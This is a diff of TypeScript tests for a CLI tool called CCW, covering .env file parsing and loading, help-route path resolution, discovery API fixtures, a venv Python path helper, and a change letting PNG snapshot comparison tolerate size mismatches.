import { existsSync, mkdtempSync, writeFileSync, rmSync } from 'node:fs';
|
||||
import { tmpdir, homedir } from 'node:os';
|
||||
import { join } from 'node:path';
|
||||
|
||||
// Set test CCW home before importing module
|
||||
const TEST_CCW_HOME = mkdtempSync(join(tmpdir(), 'ccw-env-file-test-'));
|
||||
process.env.CCW_DATA_DIR = TEST_CCW_HOME;
|
||||
|
||||
// Import from dist (built version)
|
||||
const cliExecutorPath = new URL('../dist/tools/cli-executor-core.js', import.meta.url).href;
|
||||
|
||||
describe('Env File Loading Mechanism', async () => {
|
||||
let parseEnvFile: (content: string) => Record<string, string>;
|
||||
let loadEnvFile: (envFilePath: string) => Record<string, string>;
|
||||
let testTempDir: string;
|
||||
|
||||
before(async () => {
|
||||
const mod = await import(cliExecutorPath);
|
||||
parseEnvFile = mod.parseEnvFile;
|
||||
loadEnvFile = mod.loadEnvFile;
|
||||
testTempDir = mkdtempSync(join(tmpdir(), 'env-test-'));
|
||||
});
|
||||
|
||||
after(() => {
|
||||
// Cleanup test directories
|
||||
if (existsSync(testTempDir)) {
|
||||
rmSync(testTempDir, { recursive: true, force: true });
|
||||
}
|
||||
if (existsSync(TEST_CCW_HOME)) {
|
||||
rmSync(TEST_CCW_HOME, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
describe('parseEnvFile', () => {
|
||||
it('should parse simple KEY=value pairs', () => {
|
||||
const content = `API_KEY=abc123
|
||||
SECRET=mysecret`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'abc123');
|
||||
assert.equal(result['SECRET'], 'mysecret');
|
||||
});
|
||||
|
||||
it('should handle double-quoted values', () => {
|
||||
const content = `API_KEY="value with spaces"
|
||||
PATH="/usr/local/bin"`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value with spaces');
|
||||
assert.equal(result['PATH'], '/usr/local/bin');
|
||||
});
|
||||
|
||||
it('should handle single-quoted values', () => {
|
||||
const content = `API_KEY='value with spaces'
|
||||
NAME='John Doe'`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value with spaces');
|
||||
assert.equal(result['NAME'], 'John Doe');
|
||||
});
|
||||
|
||||
it('should skip comments', () => {
|
||||
const content = `# This is a comment
|
||||
API_KEY=value
|
||||
# Another comment
|
||||
SECRET=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should skip empty lines', () => {
|
||||
const content = `
|
||||
API_KEY=value
|
||||
|
||||
SECRET=test
|
||||
|
||||
`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
});
|
||||
|
||||
it('should handle values with equals signs', () => {
|
||||
const content = `DATABASE_URL=postgresql://user:pass@host/db?sslmode=require`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['DATABASE_URL'], 'postgresql://user:pass@host/db?sslmode=require');
|
||||
});
|
||||
|
||||
it('should handle Windows-style line endings (CRLF)', () => {
|
||||
const content = `API_KEY=value\r\nSECRET=test\r\n`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should trim whitespace around keys and values', () => {
|
||||
const content = ` API_KEY = value
|
||||
SECRET = test `;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should skip lines without equals sign', () => {
|
||||
const content = `API_KEY=value
|
||||
INVALID_LINE
|
||||
SECRET=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
assert.equal(result['INVALID_LINE'], undefined);
|
||||
});
|
||||
|
||||
it('should handle empty values', () => {
|
||||
const content = `EMPTY_VALUE=
|
||||
ANOTHER=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['EMPTY_VALUE'], '');
|
||||
assert.equal(result['ANOTHER'], 'test');
|
||||
});
|
||||
|
||||
it('should handle mixed format content', () => {
|
||||
const content = `# Gemini API Configuration
|
||||
GEMINI_API_KEY="sk-gemini-xxx"
|
||||
|
||||
# OpenAI compatible settings
|
||||
OPENAI_API_BASE='https://api.example.com/v1'
|
||||
OPENAI_API_KEY=abc123
|
||||
|
||||
# Feature flags
|
||||
ENABLE_DEBUG=true`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['GEMINI_API_KEY'], 'sk-gemini-xxx');
|
||||
assert.equal(result['OPENAI_API_BASE'], 'https://api.example.com/v1');
|
||||
assert.equal(result['OPENAI_API_KEY'], 'abc123');
|
||||
assert.equal(result['ENABLE_DEBUG'], 'true');
|
||||
assert.equal(Object.keys(result).length, 4);
|
||||
});
|
||||
});
|
||||
|
||||
describe('loadEnvFile', () => {
|
||||
it('should load env file from absolute path', () => {
|
||||
const envPath = join(testTempDir, 'test.env');
|
||||
writeFileSync(envPath, 'API_KEY=test_value\nSECRET=123');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['API_KEY'], 'test_value');
|
||||
assert.equal(result['SECRET'], '123');
|
||||
});
|
||||
|
||||
it('should return empty object for non-existent file', () => {
|
||||
const result = loadEnvFile('/non/existent/path/.env');
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
|
||||
it('should expand ~ to home directory', () => {
|
||||
// Create .env-test in home directory for testing
|
||||
const homeEnvPath = join(homedir(), '.ccw-env-test');
|
||||
writeFileSync(homeEnvPath, 'HOME_TEST_KEY=home_value');
|
||||
|
||||
try {
|
||||
const result = loadEnvFile('~/.ccw-env-test');
|
||||
assert.equal(result['HOME_TEST_KEY'], 'home_value');
|
||||
} finally {
|
||||
// Cleanup
|
||||
if (existsSync(homeEnvPath)) {
|
||||
rmSync(homeEnvPath);
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
it('should handle relative paths', () => {
|
||||
const envPath = join(testTempDir, 'relative.env');
|
||||
writeFileSync(envPath, 'RELATIVE_KEY=rel_value');
|
||||
|
||||
// Save and change cwd
|
||||
const originalCwd = process.cwd();
|
||||
try {
|
||||
process.chdir(testTempDir);
|
||||
const result = loadEnvFile('./relative.env');
|
||||
assert.equal(result['RELATIVE_KEY'], 'rel_value');
|
||||
} finally {
|
||||
process.chdir(originalCwd);
|
||||
}
|
||||
});
|
||||
|
||||
it('should handle empty file', () => {
|
||||
const envPath = join(testTempDir, 'empty.env');
|
||||
writeFileSync(envPath, '');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
|
||||
it('should handle file with only comments', () => {
|
||||
const envPath = join(testTempDir, 'comments.env');
|
||||
writeFileSync(envPath, '# Just a comment\n# Another comment\n');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Integration scenario: Gemini CLI env file', () => {
|
||||
it('should correctly parse typical Gemini .env file', () => {
|
||||
const geminiEnvContent = `# Gemini CLI Environment Configuration
|
||||
# Created by CCW Dashboard
|
||||
|
||||
# Google AI API Key
|
||||
GOOGLE_API_KEY="AIzaSyXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
|
||||
# Optional: Custom API endpoint
|
||||
# GOOGLE_API_BASE=https://generativelanguage.googleapis.com/v1beta
|
||||
|
||||
# Model configuration
|
||||
GEMINI_MODEL=gemini-2.5-pro
|
||||
|
||||
# Rate limiting
|
||||
GEMINI_RATE_LIMIT=60
|
||||
`;
|
||||
const envPath = join(testTempDir, '.gemini-env');
|
||||
writeFileSync(envPath, geminiEnvContent);
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['GOOGLE_API_KEY'], 'AIzaSyXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
|
||||
assert.equal(result['GEMINI_MODEL'], 'gemini-2.5-pro');
|
||||
assert.equal(result['GEMINI_RATE_LIMIT'], '60');
|
||||
assert.equal(result['GOOGLE_API_BASE'], undefined); // Commented out
|
||||
});
|
||||
|
||||
it('should correctly parse typical Qwen .env file', () => {
|
||||
const qwenEnvContent = `# Qwen CLI Environment Configuration
|
||||
|
||||
# DashScope API Key (Alibaba Cloud)
|
||||
DASHSCOPE_API_KEY=sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
# OpenAI-compatible endpoint settings
|
||||
OPENAI_API_BASE=https://dashscope.aliyuncs.com/compatible-mode/v1
|
||||
OPENAI_API_KEY=sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
# Model selection
|
||||
QWEN_MODEL=qwen2.5-coder-32b
|
||||
`;
|
||||
const envPath = join(testTempDir, '.qwen-env');
|
||||
writeFileSync(envPath, qwenEnvContent);
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['DASHSCOPE_API_KEY'], 'sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
|
||||
assert.equal(result['OPENAI_API_BASE'], 'https://dashscope.aliyuncs.com/compatible-mode/v1');
|
||||
assert.equal(result['QWEN_MODEL'], 'qwen2.5-coder-32b');
|
||||
});
|
||||
});
|
||||
});
|
||||
127
ccw/tests/help-routes.test.ts
Normal file
@@ -0,0 +1,127 @@
|
||||
/**
|
||||
* Unit tests for Help Routes (ccw/src/core/routes/help-routes.ts)
|
||||
*
|
||||
* Tests getIndexDir path resolution logic.
|
||||
* Uses Node's built-in test runner (node:test).
|
||||
*/
|
||||
|
||||
import { describe, it, beforeEach, afterEach, mock } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
import { join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
|
||||
// Store original existsSync
|
||||
import * as fs from 'node:fs';
|
||||
const originalExistsSync = fs.existsSync;
|
||||
|
||||
// Track existsSync calls
|
||||
const existsSyncCalls: string[] = [];
|
||||
let existsSyncResults: Map<string, boolean> = new Map();
|
||||
|
||||
// Mock existsSync
|
||||
(fs as any).existsSync = (path: string): boolean => {
|
||||
existsSyncCalls.push(path);
|
||||
return existsSyncResults.get(path) ?? false;
|
||||
};
|
||||
|
||||
describe('Help Routes - getIndexDir', () => {
|
||||
beforeEach(() => {
|
||||
existsSyncCalls.length = 0;
|
||||
existsSyncResults = new Map();
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
(fs as any).existsSync = originalExistsSync;
|
||||
});
|
||||
|
||||
describe('Path resolution priority (Issue #66 fix verification)', () => {
|
||||
it('should prefer project path over user path when project path exists', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Both paths exist, but project path should be preferred
|
||||
existsSyncResults.set(projectIndexDir, true);
|
||||
existsSyncResults.set(userIndexDir, true);
|
||||
|
||||
// We can't directly test getIndexDir as it's not exported,
|
||||
// but we can verify the expected path structure
|
||||
assert.equal(projectIndexDir, '/test/project/.claude/skills/ccw-help/index');
|
||||
assert.ok(projectIndexDir.includes('ccw-help')); // Correct directory name
|
||||
assert.ok(!projectIndexDir.includes('command-guide')); // Old incorrect name
|
||||
});
|
||||
|
||||
it('should fall back to user path when project path does not exist', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Only user path exists
|
||||
existsSyncResults.set(projectIndexDir, false);
|
||||
existsSyncResults.set(userIndexDir, true);
|
||||
|
||||
// Verify path structure
|
||||
assert.ok(userIndexDir.includes('ccw-help'));
|
||||
assert.ok(!userIndexDir.includes('command-guide'));
|
||||
});
|
||||
|
||||
it('should use correct directory name ccw-help (not command-guide)', () => {
|
||||
// Verify the correct directory name is used
|
||||
const expectedDir = '.claude/skills/ccw-help/index';
|
||||
const incorrectDir = '.claude/skills/command-guide/index';
|
||||
|
||||
assert.ok(expectedDir.includes('ccw-help'));
|
||||
assert.ok(!expectedDir.includes('command-guide'));
|
||||
assert.notEqual(expectedDir, incorrectDir);
|
||||
});
|
||||
|
||||
it('should return null when neither path exists', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Neither path exists
|
||||
existsSyncResults.set(projectIndexDir, false);
|
||||
existsSyncResults.set(userIndexDir, false);
|
||||
|
||||
// Both should be checked
|
||||
// The actual function would return null in this case
|
||||
});
|
||||
});
|
||||
|
||||
describe('Pure function behavior (Review recommendation)', () => {
|
||||
it('should not rely on module-level state', () => {
|
||||
// getIndexDir now accepts projectPath as parameter
|
||||
// This test verifies the function signature expectation
|
||||
const projectPath1 = '/project1';
|
||||
const projectPath2 = '/project2';
|
||||
|
||||
// Different project paths should produce different index paths
|
||||
const indexPath1 = join(projectPath1, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const indexPath2 = join(projectPath2, '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
assert.notEqual(indexPath1, indexPath2);
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Help Routes - Path Construction', () => {
|
||||
it('should construct correct project index path', () => {
|
||||
const projectPath = 'D:\\MyProject';
|
||||
const expectedPath = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Verify path includes correct components
|
||||
assert.ok(expectedPath.includes('.claude'));
|
||||
assert.ok(expectedPath.includes('skills'));
|
||||
assert.ok(expectedPath.includes('ccw-help'));
|
||||
assert.ok(expectedPath.includes('index'));
|
||||
});
|
||||
|
||||
it('should construct correct user index path', () => {
|
||||
const expectedPath = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Verify path includes correct components
|
||||
assert.ok(expectedPath.includes(homedir()));
|
||||
assert.ok(expectedPath.includes('ccw-help'));
|
||||
});
|
||||
});
|
||||
@@ -182,6 +182,80 @@ function createDiscoveryFixture(projectRoot: string): { discoveryId: string; fin
|
||||
return { discoveryId, findingId, discoveryDir };
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates a discovery fixture using the NEW format:
|
||||
* - perspectives is a string array
|
||||
* - status tracked in perspectives_completed/perspectives_failed
|
||||
* - stats in results object
|
||||
*/
|
||||
function createNewFormatDiscoveryFixture(projectRoot: string): { discoveryId: string; findingId: string; discoveryDir: string } {
|
||||
const discoveryId = `DSC-NEW-${Date.now()}-${Math.random().toString(16).slice(2, 8)}`;
|
||||
const findingId = 'F-NEW-001';
|
||||
|
||||
const discoveryDir = join(projectRoot, '.workflow', 'issues', 'discoveries', discoveryId);
|
||||
const perspectivesDir = join(discoveryDir, 'perspectives');
|
||||
mkdirSync(perspectivesDir, { recursive: true });
|
||||
|
||||
const createdAt = new Date().toISOString();
|
||||
writeFileSync(
|
||||
join(discoveryDir, 'discovery-state.json'),
|
||||
JSON.stringify(
|
||||
{
|
||||
discovery_id: discoveryId,
|
||||
target_pattern: 'src/**/*.ts',
|
||||
phase: 'complete',
|
||||
created_at: createdAt,
|
||||
updated_at: createdAt,
|
||||
target: {
|
||||
files_count: { total: 10 },
|
||||
project: { name: 'test', path: projectRoot },
|
||||
},
|
||||
// New format: perspectives as string array
|
||||
perspectives: ['bug', 'security', 'performance'],
|
||||
perspectives_completed: ['bug', 'security'],
|
||||
perspectives_failed: ['performance'],
|
||||
external_research: { enabled: false, completed: false },
|
||||
// New format: stats in results object
|
||||
results: {
|
||||
total_findings: 5,
|
||||
issues_generated: 2,
|
||||
priority_distribution: { critical: 1, high: 2, medium: 1, low: 1 },
|
||||
findings_by_perspective: { bug: 3, security: 2 },
|
||||
},
|
||||
},
|
||||
null,
|
||||
2,
|
||||
),
|
||||
'utf8',
|
||||
);
|
||||
|
||||
writeFileSync(
|
||||
join(perspectivesDir, 'bug.json'),
|
||||
JSON.stringify(
|
||||
{
|
||||
summary: { total: 3 },
|
||||
findings: [
|
||||
{
|
||||
id: findingId,
|
||||
title: 'New format finding',
|
||||
description: 'Example from new format',
|
||||
priority: 'high',
|
||||
perspective: 'bug',
|
||||
file: 'src/example.ts',
|
||||
line: 100,
|
||||
suggested_issue: { title: 'New format issue', priority: 2, labels: ['bug'] },
|
||||
},
|
||||
],
|
||||
},
|
||||
null,
|
||||
2,
|
||||
),
|
||||
'utf8',
|
||||
);
|
||||
|
||||
return { discoveryId, findingId, discoveryDir };
|
||||
}
|
||||
|
||||
describe('discovery routes integration', async () => {
|
||||
before(async () => {
|
||||
mock.method(console, 'log', () => {});
|
||||
@@ -358,5 +432,103 @@ describe('discovery routes integration', async () => {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
// ========== NEW FORMAT TESTS ==========
|
||||
|
||||
it('GET /api/discoveries lists new format discovery sessions with correct stats', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-newformat-'));
|
||||
try {
|
||||
const { discoveryId } = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', '/api/discoveries');
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(Array.isArray(res.json.discoveries), true);
|
||||
assert.equal(res.json.total, 1);
|
||||
|
||||
const discovery = res.json.discoveries[0];
|
||||
assert.equal(discovery.discovery_id, discoveryId);
|
||||
assert.equal(discovery.phase, 'complete');
|
||||
// Verify stats are extracted from results object
|
||||
assert.equal(discovery.total_findings, 5);
|
||||
assert.equal(discovery.issues_generated, 2);
|
||||
assert.deepEqual(discovery.priority_distribution, { critical: 1, high: 2, medium: 1, low: 1 });
|
||||
// Verify perspectives is string array
|
||||
assert.ok(Array.isArray(discovery.perspectives));
|
||||
assert.ok(discovery.perspectives.includes('bug'));
|
||||
assert.ok(discovery.perspectives.includes('security'));
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
it('GET /api/discoveries/:id/progress returns correct progress for new format', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-newformat-'));
|
||||
try {
|
||||
const { discoveryId } = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', `/api/discoveries/${encodeURIComponent(discoveryId)}/progress`);
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(res.json.discovery_id, discoveryId);
|
||||
assert.ok(res.json.progress);
|
||||
|
||||
const pa = res.json.progress.perspective_analysis;
|
||||
assert.equal(pa.total, 3); // bug, security, performance
|
||||
assert.equal(pa.completed, 2); // bug, security
|
||||
assert.equal(pa.failed, 1); // performance
|
||||
assert.equal(pa.in_progress, 0);
|
||||
assert.equal(pa.percent_complete, 100); // (completed + failed) / total = 3/3 = 100%
|
||||
|
||||
// Verify agent_status is converted to object array for UI compatibility
|
||||
assert.ok(Array.isArray(res.json.agent_status));
|
||||
const bugStatus = res.json.agent_status.find((s: any) => s.name === 'bug');
|
||||
assert.ok(bugStatus);
|
||||
assert.equal(bugStatus.status, 'completed');
|
||||
const perfStatus = res.json.agent_status.find((s: any) => s.name === 'performance');
|
||||
assert.ok(perfStatus);
|
||||
assert.equal(perfStatus.status, 'failed');
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
it('mixed old and new format discoveries are listed correctly', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-mixed-'));
|
||||
try {
|
||||
const oldFormat = createDiscoveryFixture(projectRoot);
|
||||
const newFormat = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', '/api/discoveries');
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(res.json.total, 2);
|
||||
|
||||
// Both formats should be parsed correctly
|
||||
const oldDiscovery = res.json.discoveries.find((d: any) => d.discovery_id === oldFormat.discoveryId);
|
||||
const newDiscovery = res.json.discoveries.find((d: any) => d.discovery_id === newFormat.discoveryId);
|
||||
|
||||
assert.ok(oldDiscovery);
|
||||
assert.ok(newDiscovery);
|
||||
|
||||
// Old format stats
|
||||
assert.equal(oldDiscovery.total_findings, 1);
|
||||
|
||||
// New format stats from results object
|
||||
assert.equal(newDiscovery.total_findings, 5);
|
||||
assert.equal(newDiscovery.issues_generated, 2);
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
@@ -346,3 +346,45 @@ describe('LiteLLM client bridge', () => {
|
||||
assert.ok(String(status.error).includes('ccw_litellm not installed'));
|
||||
});
|
||||
});
|
||||
|
||||
describe('getCodexLensVenvPython (Issue #68 fix)', () => {
|
||||
it('should be exported from the module', async () => {
|
||||
assert.ok(typeof mod.getCodexLensVenvPython === 'function');
|
||||
});
|
||||
|
||||
it('should return a string path', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
assert.equal(typeof pythonPath, 'string');
|
||||
assert.ok(pythonPath.length > 0);
|
||||
});
|
||||
|
||||
it('should return correct path structure for CodexLens venv', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
|
||||
// On Windows: should contain Scripts/python.exe
|
||||
// On Unix: should contain bin/python
|
||||
const isWindows = process.platform === 'win32';
|
||||
|
||||
if (isWindows) {
|
||||
// Either it's the venv path with Scripts, or fallback to 'python'
|
||||
const isVenvPath = pythonPath.includes('Scripts') && pythonPath.includes('python');
|
||||
const isFallback = pythonPath === 'python';
|
||||
assert.ok(isVenvPath || isFallback, `Expected venv path or 'python' fallback, got: ${pythonPath}`);
|
||||
} else {
|
||||
// On Unix: either venv path with bin/python, or fallback
|
||||
const isVenvPath = pythonPath.includes('bin') && pythonPath.includes('python');
|
||||
const isFallback = pythonPath === 'python';
|
||||
assert.ok(isVenvPath || isFallback, `Expected venv path or 'python' fallback, got: ${pythonPath}`);
|
||||
}
|
||||
});
|
||||
|
||||
it('should include .codexlens/venv in path when venv exists', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
|
||||
// If not falling back to 'python', should contain .codexlens/venv
|
||||
if (pythonPath !== 'python') {
|
||||
assert.ok(pythonPath.includes('.codexlens'), `Expected .codexlens in path, got: ${pythonPath}`);
|
||||
assert.ok(pythonPath.includes('venv'), `Expected venv in path, got: ${pythonPath}`);
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
@@ -131,8 +131,23 @@ type CompareResult = {
|
||||
type CompareOptions = {
|
||||
pixelmatchThreshold?: number;
|
||||
diffPath?: string;
|
||||
allowSizeMismatch?: boolean;
|
||||
};
|
||||
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
function extractRegion(png: any, width: number, height: number): Buffer {
|
||||
const bytesPerPixel = 4; // RGBA
|
||||
const result = Buffer.alloc(width * height * bytesPerPixel);
|
||||
|
||||
for (let y = 0; y < height; y++) {
|
||||
const srcOffset = y * png.width * bytesPerPixel;
|
||||
const dstOffset = y * width * bytesPerPixel;
|
||||
png.data.copy(result, dstOffset, srcOffset, srcOffset + width * bytesPerPixel);
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
export function compareSnapshots(
|
||||
baselinePath: string,
|
||||
currentPath: string,
|
||||
@@ -142,23 +157,39 @@ export function compareSnapshots(
|
||||
const baselinePng = PNG.sync.read(readFileSync(baselinePath));
|
||||
const currentPng = PNG.sync.read(readFileSync(currentPath));
|
||||
|
||||
if (baselinePng.width !== currentPng.width || baselinePng.height !== currentPng.height) {
|
||||
const sizeMismatch =
|
||||
baselinePng.width !== currentPng.width || baselinePng.height !== currentPng.height;
|
||||
|
||||
if (sizeMismatch && !options?.allowSizeMismatch) {
|
||||
throw new Error(
|
||||
`Snapshot size mismatch: baseline=${baselinePng.width}x${baselinePng.height} current=${currentPng.width}x${currentPng.height}`
|
||||
);
|
||||
}
|
||||
|
||||
const diffPng = new PNG({ width: baselinePng.width, height: baselinePng.height });
|
||||
// Use minimum dimensions for comparison when sizes differ
|
||||
const compareWidth = Math.min(baselinePng.width, currentPng.width);
|
||||
const compareHeight = Math.min(baselinePng.height, currentPng.height);
|
||||
const diffPng = new PNG({ width: compareWidth, height: compareHeight });
|
||||
|
||||
// Extract comparable regions when sizes differ
|
||||
let baselineData = baselinePng.data;
|
||||
let currentData = currentPng.data;
|
||||
|
||||
if (sizeMismatch) {
|
||||
baselineData = extractRegion(baselinePng, compareWidth, compareHeight);
|
||||
currentData = extractRegion(currentPng, compareWidth, compareHeight);
|
||||
}
|
||||
|
||||
const diffPixels = pixelmatch(
|
||||
baselinePng.data,
|
||||
currentPng.data,
|
||||
baselineData,
|
||||
currentData,
|
||||
diffPng.data,
|
||||
baselinePng.width,
|
||||
baselinePng.height,
|
||||
compareWidth,
|
||||
compareHeight,
|
||||
{ threshold: options?.pixelmatchThreshold ?? 0.1 }
|
||||
);
|
||||
|
||||
const totalPixels = baselinePng.width * baselinePng.height;
|
||||
const totalPixels = compareWidth * compareHeight;
|
||||
const diffRatio = totalPixels > 0 ? diffPixels / totalPixels : 0;
|
||||
const pass = diffRatio <= tolerancePercent / 100;
|
||||
|
||||
|
||||
|
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 53 KiB |
|
Before Width: | Height: | Size: 29 KiB After Width: | Height: | Size: 42 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 53 KiB |
|
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 27 KiB |
|
Before Width: | Height: | Size: 47 KiB After Width: | Height: | Size: 65 KiB |
|
Before Width: | Height: | Size: 118 KiB After Width: | Height: | Size: 138 KiB |
|
Before Width: | Height: | Size: 66 KiB After Width: | Height: | Size: 88 KiB |